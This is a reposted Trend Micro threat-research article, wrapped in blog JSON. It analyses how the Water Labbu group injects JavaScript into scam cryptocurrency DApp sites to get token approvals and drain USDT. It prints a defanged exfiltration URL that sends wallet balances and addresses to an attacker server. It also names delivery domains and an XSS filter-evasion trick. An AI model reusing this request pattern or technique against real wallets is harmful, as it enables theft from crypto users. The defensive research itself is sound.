{"id":48736,"date":"2022-10-03T00:00:00","date_gmt":"2022-10-03T00:00:00","guid":{"rendered":"urn:uuid:947c5b23-247f-bad5-9fed-a184b4ea6234"},"modified":"2022-10-03T00:00:00","modified_gmt":"2022-10-03T00:00:00","slug":"water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","title":{"rendered":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\" content=\"The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"apt &amp; targeted attacks,cyber crime,web,research,articles, news, reports,cyber threats\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2022-10-03\"> <meta property=\"article:tag\" content=\"cyber crime\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\"> <title>Water Labbu Abuses Malicious DApps to Steal Cryptocurrency<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\"><br \/>\n<meta property=\"og:title\" content=\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\"><br \/>\n<meta property=\"og:description\" content=\"The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\"><br \/>\n<meta name=\"twitter:description\" content=\"The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"49.830975698223\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1899488347\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.2726063829787\">\n<div class=\"article-details\" role=\"heading\" readability=\"38.066489361702\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Crime<\/p>\n<p class=\"article-details__description\">The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.<\/p>\n<p class=\"article-details__author-by\">By: Joseph C Chen, Jaromir Horejsi <time class=\"article-details__date\">October 03, 2022<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"44.311345646438\">\n<div readability=\"34.46437994723\">\n<p>We discovered a threat actor we named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, &nbsp;interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victim\u2019s wallets, unlike other similar campaigns, they did not use any kind of social engineering \u2014 at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.<\/p>\n<p>In a parasitic manner, the threat actor compromised the websites of other scammers posing as a decentralized application (<a href=\"https:\/\/www.investopedia.com\/terms\/d\/decentralized-applications-dapps.asp\">DApp<\/a>) and injected malicious JavaScript code into them. The techniques used by the original scammers are detailed in an <a href=\"https:\/\/www.ic3.gov\/Media\/Y2022\/PSA220721\">alert<\/a> released from law enforcement agencies.<\/p>\n<p>When the threat actor finds a victim who has a large amount of cryptocurrency stored in a wallet that is connected to one of the scam websites, the injected JavaScript payload will send a request for permissions. The request is disguised to look like it was being sent from a compromised website and asks for permission (token allowance) to transfer a nearly-unlimited amount of <a href=\"https:\/\/tether.to\/en\/\">USD Tether<\/a> (USDT, which is a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Stablecoin\">stablecoin<\/a> pegged to the US dollar with a value of 1:1) from the target\u2019s wallet.<\/p>\n<p>Water Labbu\u2019s targets are led to believe that the request was originally issued by a DApp, which may cause them to disregard thoroughly reviewing the permission\u2019s details. However, the granted permission does not belong to the crypto addresses of the original scammer, but to another address controlled by Water Labbu. The threat actor can then use the obtained permission to drain all USDT funds from the victim\u2019s wallet.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-infection-chain.jpg\" alt=\"Figure 1. The Water Labbu attack flow\"><figcaption>Figure 1. The Water Labbu attack flow<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"36.535172413793\">\n<div readability=\"20.87724137931\">\n<p>As of the time of writing, we found 45 fraudulent cryptocurrency-related DApp websites that have been compromised by Water Labbu. These websites show similar styles and themes to the websites used in the \u201c<a href=\"https:\/\/www.reddit.com\/r\/liquiditymining\/comments\/puva25\/lossless_liquidity_mining_pledgefree\/\">Lossless Mining Liquidity Pledge Free<\/a>\u201d scams.<\/p>\n<p>Upon checking the transaction records of the threat actor\u2019s addresses on the Ethereum blockchain, we discovered that they have successfully stolen funds from at least nine different victims for a total amount of at least 316,728 USDT.<\/p>\n<p>In the following sections, we are going to share how the actor used injected JavaScript code to hijack cryptocurrency from fraudulent DApp websites, as well as additional findings that hints at how they may have compromised scammers.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-2.png\" alt=\"Figure 2. Screenshot of a compromised fraudulent DApp website\"><figcaption>Figure 2. Screenshot of a compromised fraudulent DApp website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>As we mentioned in the introduction, Water Labbu\u2019s modus involves compromising scam DApp websites and injecting their JavaScript payload into them. The DApp websites seem to be designed via some form of custom template, where the displayed messages in an announcement box are received in JSON format by sending an HTTP request to a given URL. The content of the request (Figure 3) shows a JSON object with a \u201chelper\u201d key containing a few embedded items. The first item is clearly injected and contains an evaluation of the Base64-encoded script.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-3.png\" alt=\"Figure 3. Visual example of an announcement box from a scam DApp website\"><figcaption>Figure 3. Visual example of an announcement box from a scam DApp website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-4.png\" alt=\"Figure 4. Displayed data received in JSON format\"><figcaption>Figure 4. Displayed data received in JSON format<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.079295154185\">\n<div readability=\"20.491189427313\">\n<p>In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64- encoded JavaScript payload using &nbsp;the \u201conerror\u201d event, in what is known as an <a href=\"https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/XSS_Filter_Evasion_Cheat_Sheet.html\">XSS evasion technique<\/a>, to bypass Cross Site Scripting (XSS) filters. The injected payload then creates another script element that loads another script from the delivery server <i>tmpmeta[.]com<\/i>. The delivery server then filters victims and delivers different content based on the IP address and the browser User-Agent header (which is used to help &nbsp;determine the victims\u2019 environment).<\/p>\n<p>We noticed the following behavior:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">If the victim loads the script from a mobile device using Android or iOS, it returns the first stage script with cryptocurrency-theft capabilities.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">If the victim loads the script from a desktop running Windows, it returns another script showing a fake Flash update message asking the victim to download a malicious executable file.<\/span><\/li>\n<\/ul>\n<p>It\u2019s worth mentioning that the delivery server implements a mechanism to avoid loading a script multiple times from the same IP address over a short period of time. If an IP address accessed the delivery server in the last few hours or the type of device the victim uses does not match other required conditions, it will return a simple stealer script that will collect cookie and <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Window\/localStorage\">LocalStorage<\/a> data and send them back to the delivery server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-5.png\" alt=\"Figure 5. Stealer script that collects cookie and LocalStorage data\"><figcaption>Figure 5. Stealer script that collects cookie and LocalStorage data<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.671038251366\">\n<div readability=\"20.265573770492\">\n<h2><span class=\"body-subhead-title\">The cryptocurrency-stealing script: first stage<\/span><\/h2>\n<p>Initially, the <a href=\"https:\/\/web3js.readthedocs.io\/en\/v1.7.5\/\">web3.js<\/a> library is loaded. This provides the first stage script the ability to connect to the victim\u2019s wallet, although the malicious script will communicate with the victim\u2019s wallet only if a victim has their wallet connected to the compromised DApp website. Gaining access to the wallet allows Water Labbu to gather the target\u2019s Ethereum address and balance. The script also interacts with <a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7\">Tether USD smart contract<\/a> &nbsp;to receive the victim\u2019s USDT balance. If the wallet contains more than 0.001 ETH or more than 1 USDT, it will send the wallet balance information and the wallet address to the information collecting server, <i>linkstometa[.]com<\/i>, via an HTTP request.<\/p>\n<p>The following text shows the request to exfiltrate the wallet balance:<\/p>\n<p><i><span class=\"blockquote\">hxxps[:]\/\/linkstometa[.]com\/data\/?get&amp;s=[%22{ETH balance}%22,%22{USDT balance}%22]&amp;j={Ethereum address}<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-6.png\" alt=\"Figure 6. Script for collecting wallet balance and the default wallet address (deobfuscated)\"><figcaption>Figure 6. Script for collecting wallet balance and the default wallet address (deobfuscated)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<h2><span class=\"body-subhead-title\">The cryptocurrency-stealing script: second stage<\/span><\/h2>\n<p>The exfiltration request will return the second stage script once the reported balance has both an ETH balance higher than 0.005 ETH and a USDT token balance higher than 22,000 USDT. Otherwise, it will return an empty payload and leave the victims for other scammers. During the second stage script, the third balance check is performed and the token allowance approval is requested.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-7.png\" alt=\"Figure 7. The script responsible for showing token allowance approval\"><figcaption>Figure 7. The script responsible for showing token allowance approval<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.245641838352\">\n<div readability=\"12.711568938193\">\n<p>The <a href=\"https:\/\/help.coinbase.com\/en\/wallet\/security\/dapp-permissions-token-approvals\">token approval<\/a> request asks victims to grant to permission to a given address to complete transactions and spend cryptocurrency assets. The malicious script requests an approval limit of 10^32 USDT, which is far more than the total available USDT tokens on the blockchain. When the \u201capprove\u201d request is issued, the cryptocurrency wallet applications will ask users to review the details of the request before confirmation. If the victim does not carefully check the request details and grants the permissions to the Water Labbu\u2019s address, the threat actor will be able to transfer all the USDT from the victim\u2019s wallet.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-8.png\" alt=\"Figure 8. The review prompt for the malicious permission requests by the cryptocurrency wallet\"><figcaption>Figure 8. The review prompt for the malicious permission requests by the cryptocurrency wallet<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.689873417722\">\n<div readability=\"27.517405063291\">\n<p>During our monitoring of Water Labbu\u2019s operations, we noticed two addresses being repeatedly used to receive the granted permissions and to transfer the victims\u2019 cryptocurrency assets.<\/p>\n<p>The address, <i><a href=\"https:\/\/etherscan.io\/address\/0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a\">0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a<\/a><\/i>, is the first to receive the token approvals from victims. As of August 2022, the address has successfully used the \u201cTransfer From\u201d method seven times to collect USDT from different addresses, likely belonging to the group\u2019s victims. Funds were then transferred to the second address, <i><a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0x3e9f1d6e244d773360dce4ca88ab3c054f502d51\">0x3e9f1d6e244d773360dce4ca88ab3c054f502d51<\/a><\/i>. The second address has two transactions transferring stolen USDT to two other addresses: &nbsp;<i><a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0x486d08f635b90196e5793725176d9f7ead155fed\">0x486d08f635b90196e5793725176d9f7ead155fed<\/a><\/i> and <i><a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf\">0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf<\/a><\/i>.<\/p>\n<p>The address, <a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0xfece995f99549011a88bbb8980bbedd8fada5a35\">0xfece995f99549011a88bbb8980bbedd8fada5a35<\/a>, is a newer one we found inside Water Labbu\u2019s scripts from June 2022. This address successfully drained USDT from two addresses, swapping them on the Uniswap cryptocurrency exchange \u2014 first to USD Coin (USDC), then to ETH \u2014 before finally sending the ETH funds to the Tornado Cash mixer.<\/p>\n<p>As of August 2022, the total amount of USDT drained by Water Labbu from nine victims amounts to 316,728 USDT.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-9.png\" alt=\"Figure 9. Diagram showing the transactions of stolen USDT\"><figcaption>Figure 9. Diagram showing the transactions of stolen USDT<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.821266968326\">\n<div readability=\"19.638009049774\">\n<p>When a target visits the compromised DApp websites using a Windows desktop, the delivery server, <i>tmpmeta[.]com<\/i>, will return a different script that will try to steal cookie and <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Window\/localStorage\">LocalStorage<\/a> data. It also loads additional scripts from other delivery servers such as <i>whg7[.]cc<\/i> and <i>r8s[.]cc<\/i>. The delivery server, <i>r8s[.]cc<\/i>, returned the latest stage script, creating a fake Flash installation message overlay on the compromised websites. The message, which is in simplified Chinese, states that Flash Player support ended on September 14, 2020, and that downloading the latest version is needed to continue viewing the page.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-10.png\" alt=\"Figure 10. The script loading sequence on a Windows desktop system\"><figcaption>Figure 10. The script loading sequence on a Windows desktop system<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-11.png\" alt=\"Figure 11. The fake Flash Player installation message being overlayed on the compromised website\"><figcaption>Figure 11. The fake Flash Player installation message being overlayed on the compromised website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-12.png\" alt=\"Figure 12. The list of files available for download from the GitHub repository \u201cflashtech9\/Flash\u201d\"><figcaption>Figure 12. The list of files available for download from the GitHub repository \u201cflashtech9\/Flash\u201d<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.354001759015\">\n<div readability=\"27.901495162709\">\n<p>Water Labbu has managed to steal cryptocurrency funds by injecting their malicious scripts to fraudulent websites of other scammers, showing a willingness to exploit the methods of other malicious actors for their own ends. Fortunately, traditional best practices for security are still applicable in this situation and can help users avoid the group\u2019s schemes.<\/p>\n<p>Users should be careful of any invitations for investment that originate from untrusted parties. Furthermore, they should not trade cryptocurrency funds on any unknown platform without thoroughly vetting its legitimacy, understanding what it does, and how it operates. We suggest that users review the parameters of the transactions (token approval limits) and ensure that it has not been modified or issued by an untrusted party.<\/p>\n<p>In the next blog entry, we are going to share our additional findings related to Water Labbu\u2019s infection chains, which includes their successful exploitation techniques and the patching of an ElectronJS-based application used by scammer<\/p>\n<p><span class=\"body-subhead-title\">Indicators of Compromise<\/span><\/p>\n<p>The indicators of compromise for this blog entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/IOCs-water-labbu.txt\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":48737,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9521,9511,9509,9535],"class_list":["post-48736","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-crime","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research","tag-trend-micro-research-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-03T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\",\"datePublished\":\"2022-10-03T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\"},\"wordCount\":1700,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Crime\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\",\"Trend Micro Research : Web\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\",\"name\":\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"datePublished\":\"2022-10-03T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"width\":1619,\"height\":1345},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat 